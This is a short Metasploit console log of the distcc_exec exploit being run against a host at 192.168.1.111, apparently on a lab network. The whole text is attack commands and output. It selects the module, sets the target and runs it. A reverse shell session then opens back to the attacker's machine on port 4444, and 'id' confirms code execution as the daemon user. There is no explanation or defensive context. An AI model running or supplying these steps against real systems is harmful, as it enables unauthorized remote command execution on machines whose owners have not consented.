msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(distcc_exec) > run
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo swakf4bpbO2EMNLX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "swakf4bpbO2EMNLX\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.113:4444 -> 192.168.1.111:46641) at 2014-07-31 23:44:49 -0400
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Abort session 1? [y/N] ^Cy
[*] 192.168.1.111 - Command shell session 1 closed. Reason: User exit